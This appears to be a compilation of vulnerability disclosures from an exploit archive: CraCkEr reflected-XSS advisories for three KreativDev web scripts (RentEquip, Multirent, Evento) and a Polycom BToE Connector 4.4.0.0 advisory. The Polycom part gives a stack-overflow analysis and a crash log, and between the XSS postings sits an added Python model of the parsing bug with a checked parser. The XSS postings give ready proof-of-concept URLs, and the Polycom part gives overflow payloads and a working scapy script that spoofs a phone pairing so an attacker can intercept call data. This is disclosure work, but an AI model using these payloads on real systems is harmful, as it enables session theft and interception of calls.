<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : RentEquip - Multipurpose Rental 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&min=1026553%3balert(1)%2f%2f772&max=227<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&min=10&max=22724204%3balert(1)%2f%2f287<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>The Microsoft® Lync™ Better Together over Ethernet (BToE) feature on <br />Polycom® VVX® business media phones enables you to control phone <br />activity from your computer using your Lync client.<br />The BToE feature enables you to place, answer, and hold audio and video <br />calls from your Polycom VVX phone and your Lync client on your computer.<br /><br />#### Title: Polycom BToE Connector 4.4.0.0 Multiple Vulnerabilities<br />#### Affected versions: 4.4.0.0<br />#### Tested on: Windows 10 Enterprise (x64), Windows 11 Home (x64), <br />PBC.exe (x86)<br />#### Credits: echo<br /><br />1. Remote stack based buffer overflow<br /><br />Polycom BToE Connector in version 4.4.0.0 is prone to a Remote Stack Based <br />Buffer Overflow.<br />The vulnerability occurs in the handling of the following BToE protocol tags: <br /><QoSDSCPValue>, <MediaPort>, <Dtmf>, <SignInState>, and is caused by the <br />lack of error checking after the call to the strstr function.<br />The value returned by strstr is then used to calculate the size of the data that <br />will be passed to strncpy; as the annotated disassembly below shows, a NULL <br />result is subtracted from the start pointer without any check.<br />Due to the limitation imposed by the recv function - direct control only <br />over 1024 bytes of data - using this vulnerability to achieve Remote <br />Code Execution is very hard (partial overwrite) or even impossible.<br /><br />0022DB5B | C68424 30020000 00 | mov byte ptr ss:[esp+230],0 |<br />0022DB63 | 68 28D83000 | push pbc.30D828 | <br />30D828:"</QoSDSCPValue>\n"<br />0022DB68 | 57 | push edi |<br />0022DB69 | 66:0FD68424 39020000 | movq qword ptr ss:[esp+239],xmm0 |<br />0022DB72 | 83C6 0E | add esi,E |<br />0022DB75 | C68424 41020000 00 | mov byte ptr ss:[esp+241],0 |<br />0022DB7D | FF15 F4222E00 | call dword ptr ds:[<&strstr>] |<br />0022DB83 | 8BF8 | mov edi,eax | <- pointer returned <br />by strstr (no error check!)<br />0022DB85 | 8D8424 38020000 | lea eax,dword ptr ss:[esp+238] |<br />0022DB8C | 2BFE | sub edi,esi | <- calculate the <br />size of QoSDSCPValue value<br />0022DB8E | 57 | push edi | 
(null - pointer)<br />0022DB8F | 56 | push esi |<br />0022DB90 | 50 | push eax |<br />0022DB91 | FF15 CC242E00 | call dword ptr ds:[<&strncpy>] | <br /><- (buffer overflow)<br />0022DB97 | 83C4 14 | add esp,14 |<br /><br />:POC:<br /><br />-- <MediaPort><br /><br /><?xml version="1.0" encoding="UTF-8" standalone="yes"?><br /><response protocolVersion="1" requestId="2"><br /><MediaPort><br />31337<br /></MediaPort>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />-- <QoSDSCPValue><br /><br /><?xml version="1.0" encoding="UTF-8" standalone="yes"?><br /><response><br /><QoSDSCPValue><br />0<br /></QoSDSCPValue>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />:CRASH LOG:<br /><br />0:004> g<br />(2d80.336c): Access violation - code c0000005 (first chance)<br />First chance exceptions are reported before any exception handling.<br />This exception may be expected and handled.<br />eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 <br />edi=00f6fffd<br />eip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0 nv up ei pl nz na <br />pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />ucrtbase!strncpy+0x109:<br />774028e9 8907 mov dword ptr [edi],eax <br />ds:002b:00f6fffd=????????<br />0:003> g<br />(2d80.336c): Unknown exception - code c00001a5 (!!! second chance !!!)<br />eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 <br />edi=00f6fffd<br />eip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0 nv up ei pl nz na <br />pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />ucrtbase!strncpy+0x109:<br />774028e9 8907 mov dword ptr [edi],eax <br />ds:002b:00f6fffd=????????<br />0:003> kb<br /> # ChildEBP RetAddr Args to Child<br />00 00f6d97c 002b9942 00f6e248 00f6d9d3 ff09262d ucrtbase!strncpy+0x109<br />WARNING: Stack unwind information not available. 
Following frames may be <br />wrong.<br />01 00f6e284 41414141 41414141 41414141 41414141 PBC+0x9942<br />02 00f6e288 41414141 41414141 41414141 41414141 0x41414141<br />03 00f6e28c 41414141 41414141 41414141 41414141 0x41414141<br />04 00f6e290 41414141 41414141 41414141 41414141 0x41414141<br />05 00f6e294 41414141 41414141 41414141 41414141 0x41414141<br />06 00f6e298 41414141 41414141 41414141 41414141 0x41414141<br />07 00f6e29c 41414141 41414141 41414141 41414141 0x41414141<br />08 00f6e2a0 41414141 41414141 41414141 41414141 0x41414141<br />09 00f6e2a4 41414141 41414141 41414141 41414141 0x41414141<br />0a 00f6e2a8 41414141 41414141 41414141 41414141 0x41414141<br />0b 00f6e2ac 41414141 41414141 41414141 41414141 0x41414141<br />0c 00f6e2b0 41414141 41414141 41414141 41414141 0x41414141<br />0d 00f6e2b4 41414141 41414141 41414141 41414141 0x41414141<br />0e 00f6e2b8 41414141 41414141 41414141 41414141 0x41414141<br />0f 00f6e2bc 41414141 41414141 41414141 41414141 0x41414141<br />10 00f6e2c0 41414141 41414141 41414141 41414141 0x41414141<br />11 00f6e2c4 41414141 41414141 41414141 41414141 0x41414141<br />12 00f6e2c8 41414141 41414141 41414141 41414141 0x41414141<br />13 00f6e2cc 41414141 41414141 41414141 41414141 0x41414141<br />14 00f6e2d0 41414141 41414141 41414141 41414141 0x41414141<br />15 00f6e2d4 41414141 41414141 41414141 41414141 0x41414141<br />16 00f6e2d8 41414141 41414141 41414141 41414141 0x41414141<br />17 00f6e2dc 41414141 41414141 41414141 41414141 0x41414141<br />18 00f6e2e0 41414141 41414141 41414141 41414141 0x41414141<br />19 00f6e2e4 41414141 41414141 41414141 41414141 0x41414141<br />1a 00f6e2e8 41414141 41414141 41414141 41414141 0x41414141<br />1b 00f6e2ec 41414141 41414141 41414141 41414141 0x41414141<br />1c 00f6e2f0 41414141 41414141 41414141 41414141 0x41414141<br />1d 00f6e2f4 41414141 41414141 41414141 41414141 0x41414141<br />1e 00f6e2f8 41414141 41414141 41414141 41414141 0x41414141<br />1f 00f6e2fc 41414141 41414141 
41414141 41414141 0x41414141<br />20 00f6e300 41414141 41414141 41414141 41414141 0x41414141<br />21 00f6e304 41414141 41414141 41414141 41414141 0x41414141<br />22 00f6e308 41414141 41414141 41414141 41414141 0x41414141<br />23 00f6e30c 41414141 41414141 41414141 41414141 0x41414141<br />24 00f6e310 41414141 41414141 41414141 41414141 0x41414141<br />25 00f6e314 41414141 41414141 41414141 41414141 0x41414141<br />26 00f6e318 41414141 41414141 41414141 41414141 0x41414141<br />27 00f6e31c 41414141 41414141 41414141 41414141 0x41414141<br />28 00f6e320 41414141 41414141 41414141 41414141 0x41414141<br />29 00f6e324 41414141 41414141 41414141 0000000a 0x41414141<br />2a 00f6e328 41414141 41414141 0000000a 00000000 0x41414141<br />2b 00f6e32c 41414141 0000000a 00000000 00000000 0x41414141<br />2c 00f6e330 00000000 00000000 00000000 00000000 0x41414141<br /><br />2. Man in the middle / Device spoofing<br /><br />The BToE protocol exists in two versions, a newer one and a legacy one.<br />The implementation of the newer BToE version in BToE Connector is based on the <br />OpenSSL library, and that version supports server authenticity verification.
The legacy BToE implementation relies on the plink tool from PuTTY and does not <br />check server authenticity while establishing the connection to the server.<br />An attacker who can reach UDP port 2081, on which PBC.exe listens, can, because <br />server authenticity is not verified, send a specially crafted packet and pair the <br />attacked user's system/Lync client with a host of the attacker's choice.<br />From this point, the attacker can intercept and/or modify all data, including <br />phone records and SRTP streams, transferred between the attacked system/Lync app <br />and the user's phone (the Polycom device).<br /><br />:POC:<br /><br />[victim system]<br /><br />C:\Windows\System32>hostname<br />victim<br /><br />C:\Windows\System32>ipconfig<br /><br />Windows IP Configuration<br /><br />Wireless LAN adapter Wi-Fi:<br /><br /> Connection-specific DNS Suffix . : NAT.in.evil.empire<br /> Link-local IPv6 Address . . . . . : <br />2001:db8:3333:4444:5555:6666:7777:8888<br /> IPv4 Address. . . . . . . . . . . : 192.168.0.11<br /> Subnet Mask . . . . . . . . . . . : 255.255.255.0<br /> Default Gateway . . . . . . . . . 
: 192.168.0.1<br /><br />C:\Windows\System32><br /><br />C:\Windows\System32>netstat -p UDP -a -n -b<br /><br />Active Connections<br /><br /> Proto Local Address Foreign Address State<br /> UDP 0.0.0.0:500 *:*<br /> IKEEXT<br /> [svchost.exe]<br /> UDP 0.0.0.0:2081 *:*<br /> [PBC.exe]<br /> ...<br /><br />C:\Windows\System32><br /><br />[attacker system]<br /><br />echo@attacker:~$ hostname<br />attacker<br />echo@attacker:~$<br /><br />echo@attacker:~$ ip a<br />...<br />3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP <br />group default qlen 1000<br /> link/ether 80:91:33:9c:b9:9f brd ff:ff:ff:ff:ff:ff<br /> inet 192.168.0.16/24 brd 192.168.0.255 scope global dynamic <br />noprefixroute wlan0<br /> valid_lft 3404sec preferred_lft 3404sec<br /> inet6 1111::2222:3333:4444:5555/66 scope link noprefixroute<br /> valid_lft forever preferred_lft forever<br />echo@attacker:~$<br /><br />root@attacker:/home# tail -n 1 /etc/passwd<br />Synergy:x:1001:1001::/home/Synergy:/bin/bash #pwd = Ch@mp$0FI1C<br />root@attacker:/home#<br /><br />root@attacker:/home# tail /etc/ssh/sshd_config<br /><br /># Example of overriding settings on a per-user basis<br />#Match User anoncvs<br /># X11Forwarding no<br /># AllowTcpForwarding no<br /># PermitTTY no<br /># ForceCommand cvs server<br /><br />AllowUsers Synergy<br /><br />root@attacker:/home#<br /><br />echo@attacker:~$ cat /home/echo/Pulpit/BTOE/BToEMiTMPoc.py<br />#!/usr/bin/python3<br /><br />import argparse, socket, struct<br />from scapy import all as scapy<br /><br />def packet(pbc_ip, pbc_port, phone_ip, phone_port):<br /> # payload: fake phone IPv4 (4 bytes), fake phone port (network byte order), then the fixed bytes below<br /> fp_ip = phone_ip.split(".");<br /> payload = struct.pack("BBBBHBBBBBBBBBBBBBBBBBBBBB",<br /> int(fp_ip[0]), int(fp_ip[1]), int(fp_ip[2]), <br />int(fp_ip[3]),<br /> socket.htons(int(phone_port)),<br /> 0x00, 0x04, 0xF3,<br />5,8,9,10,11,12,1,13,14,15,16,17,18,19,0x1A, 0x1B, 0x1C, 0x1D);<br /> packet = scapy.IP(dst=pbc_ip)/scapy.UDP(dport=pbc_port, <br 
/>sport=scapy.RandShort())/scapy.raw(payload);<br /> scapy.send(packet, verbose=False);<br /><br />def poc():<br /> opt = argparse.ArgumentParser(description='Process some integers.');<br /> opt.add_argument('--pbc_ip', action='store',<br /> type=str,<br /> help='PBC.exe IPv4 address', required=True);<br /> opt.add_argument('--pbc_port', action='store', type=int, <br />help='PBC.exe UDP port', required=True);<br /> opt.add_argument('--fake_phone_ip', action='store', type=str, <br />help='Fake phone IPv4 address', required=True);<br /> opt.add_argument('--fake_phone_port', action='store', type=str, <br />help='Fake phone TCP port', required=True);<br /> args = opt.parse_args()<br /> packet(args.pbc_ip, args.pbc_port, args.fake_phone_ip, <br />args.fake_phone_port);<br /><br />if __name__ == "__main__":<br /> poc();<br />echo@attacker:~$<br /><br />echo@attacker:~$ sudo python3 /home/echo/Pulpit/BTOE/BToEMiTMPoc.py <br />--pbc_ip 192.168.0.11 --pbc_port 2081 --fake_phone_ip 192.168.0.16 <br />--fake_phone_port 31337<br /><br />echo@attacker:~$ nc -l -v -p 31337<br />listening on [any] 31337 ...<br /><br />connect to [192.168.0.16] from attacker [192.168.0.16] 59680<br /><?xml version="1.0" encoding="UTF-8" standalone="yes"?><br /><request protocolVersion="1" requestId="2"><br /><GruuRequest></GruuRequest><br /></request><br /><br />####<br />:Recommendation:<br /><br />Since there are still no official fixes, I suggest you consider <br />blocking plink.exe from the location "C:\Program Files <br />[(x86)]\Polycom\Polycom BToE Connector"<br />in order to disable legacy BToE support in BToE Connector.<br /><br />####<br />:Disclosure Timeline:<br /><br />20.02.2023 – Initial contact with security@poly.com.<br />22.02.2023 – Sending details to HP.<br />06.03.2023 - HP/Poly plans the work schedule and fixes for the product.<br />13.03.2023 – HP/Poly was informed about the 90-day disclosure policy.<br />10.05.2023 – Request for status.<br />11.05.2023 – Release is planned for 
mid-June.<br />13.06.2023 - Request for status.<br />15.06.2023 - Publication.<br /><br />-----BEGIN PGP PUBLIC KEY BLOCK-----<br /><br />xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQ<br />m0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78<br />QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLl<br />oMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVT<br />HhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEB<br />B0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYh<br />BFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1<br />KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/<br />YPBCvA4bkQ9SA37Ak2UDDg==<br />=6VCh<br />-----END PGP PUBLIC KEY BLOCK-----<br /><br /><br /><br /><br /></code></pre>
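The following is an added example and is not code from the advisory above nor from Poly/HP. It models, in Python, the tag-value extraction that section 1 describes: the disassembly searches for the closing tag together with a trailing newline (`"</QoSDSCPValue>\n"`), and when that byte sequence is absent strstr returns NULL, the NULL is subtracted from the value's start pointer, and the bogus size reaches strncpy. `naive_length` mirrors that unchecked arithmetic; `extract_tag_value` and `validate_message` show the checks a parser needs (every lookup verified, length bounded, message well-formed). `MAX_VALUE_LEN` is an assumed bound, since the advisory does not give the real stack buffer size, and the sample messages are constructed to follow the shape of the PoC inputs.

```python
import xml.etree.ElementTree as ET

# Assumed bound for a tag value (the real buffer size in PBC.exe is not
# stated in the advisory); any fixed-size destination needs such a limit.
MAX_VALUE_LEN = 64

# Tags the advisory names as affected.
AFFECTED_TAGS = ("QoSDSCPValue", "MediaPort", "Dtmf", "SignInState")


class BtoeParseError(ValueError):
    """Raised instead of deriving a copy length from a failed lookup."""


def naive_length(data: bytes, tag: str) -> int:
    """Mirror of the unchecked computation in the handler.

    The closing tag is searched for *with* a trailing newline, exactly as the
    string constant in the disassembly.  bytes.find() returns -1 when it is
    absent (the C code gets NULL), and the subtraction goes ahead anyway, so
    the result is negative here and an enormous size_t for strncpy in C.
    """
    open_tag = f"<{tag}>".encode()
    close_tag = f"</{tag}>\n".encode()   # note the "\n": "</MediaPort>AAAA" never matches
    value_start = data.find(open_tag) + len(open_tag)
    close_pos = data.find(close_tag)     # -1 when not found, never checked
    return close_pos - value_start


def extract_tag_value(data: bytes, tag: str, max_len: int = MAX_VALUE_LEN) -> str:
    """Checked extraction: both lookups verified, length bounded before any copy."""
    open_tag = f"<{tag}>".encode()
    close_tag = f"</{tag}>".encode()
    start = data.find(open_tag)
    if start < 0:
        raise BtoeParseError(f"missing <{tag}>")
    value_start = start + len(open_tag)
    end = data.find(close_tag, value_start)
    if end < 0:
        raise BtoeParseError(f"missing </{tag}>")
    length = end - value_start
    if length > max_len:
        raise BtoeParseError(f"<{tag}> value too long ({length} > {max_len})")
    return data[value_start:end].strip().decode("ascii")


def is_well_formed_xml(data: bytes) -> bool:
    """Structural check: the PoC messages are truncated XML followed by junk.
    (For untrusted input in production, prefer defusedxml over ElementTree.)"""
    try:
        ET.fromstring(data)
        return True
    except ET.ParseError:
        return False


def validate_message(data: bytes, max_len: int = MAX_VALUE_LEN) -> list:
    """Return a list of findings; an empty list means the message is acceptable."""
    findings = []
    if not is_well_formed_xml(data):
        findings.append("not well-formed XML")
    for tag in AFFECTED_TAGS:
        if f"<{tag}>".encode() in data:
            try:
                extract_tag_value(data, tag, max_len)
            except BtoeParseError as exc:
                findings.append(str(exc))
    return findings


# Constructed sample messages (shaped like the advisory's PoC, not captured traffic).
XML_DECL = b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
GOOD_MSG = (XML_DECL + b'<response protocolVersion="1" requestId="2">\n'
            b'<MediaPort>\n31337\n</MediaPort>\n</response>\n')
POC_MEDIAPORT = (XML_DECL + b'<response protocolVersion="1" requestId="2">\n'
                 b'<MediaPort>\n31337\n</MediaPort>' + b'A' * 160)
POC_QOS = XML_DECL + b'<response>\n<QoSDSCPValue>\n0\n</QoSDSCPValue>' + b'A' * 34
LONG_DTMF = b'<response><Dtmf>' + b'9' * 100 + b'</Dtmf></response>'
NO_CLOSE = b'<response><MediaPort>\n31337\n'

if __name__ == "__main__":
    print("naive length, good message:", naive_length(GOOD_MSG, "MediaPort"))
    print("naive length, PoC message: ", naive_length(POC_MEDIAPORT, "MediaPort"))
    for name, msg in [("good", GOOD_MSG), ("poc-mediaport", POC_MEDIAPORT),
                      ("poc-qos", POC_QOS), ("long-dtmf", LONG_DTMF), ("no-close", NO_CLOSE)]:
        print(name, "->", validate_message(msg) or "ok")
```

The negative value from `naive_length` on the PoC-shaped message is the whole bug: the search string includes the newline, the PoC puts junk straight after the closing tag, and nothing checks the lookup before the subtraction. The checked extractor rejects the missing-tag and oversized cases, and the well-formedness check catches the truncated messages even where the closing tag itself is present.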
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : Multirent - Multivendor Equipment Rental 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&rating=5&min=5650846%3balert(1)%2f%2f282&max=300<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&rating=5&min=56&max=30053987%3balert(1)%2f%2f236<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : Evento - Multivendor Event Ticket Booking 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /events<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/evento/events?search-input=&category=wedding&event=venue&min=2659526%3balert(1)%2f%2f781&max=95<br /><br /><br />Path: /events<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/evento/events?category=wedding&event=venue&min=26&max=9560734%3balert(1)%2f%2f989<br /><br /><br />[-] Done<br /></code></pre>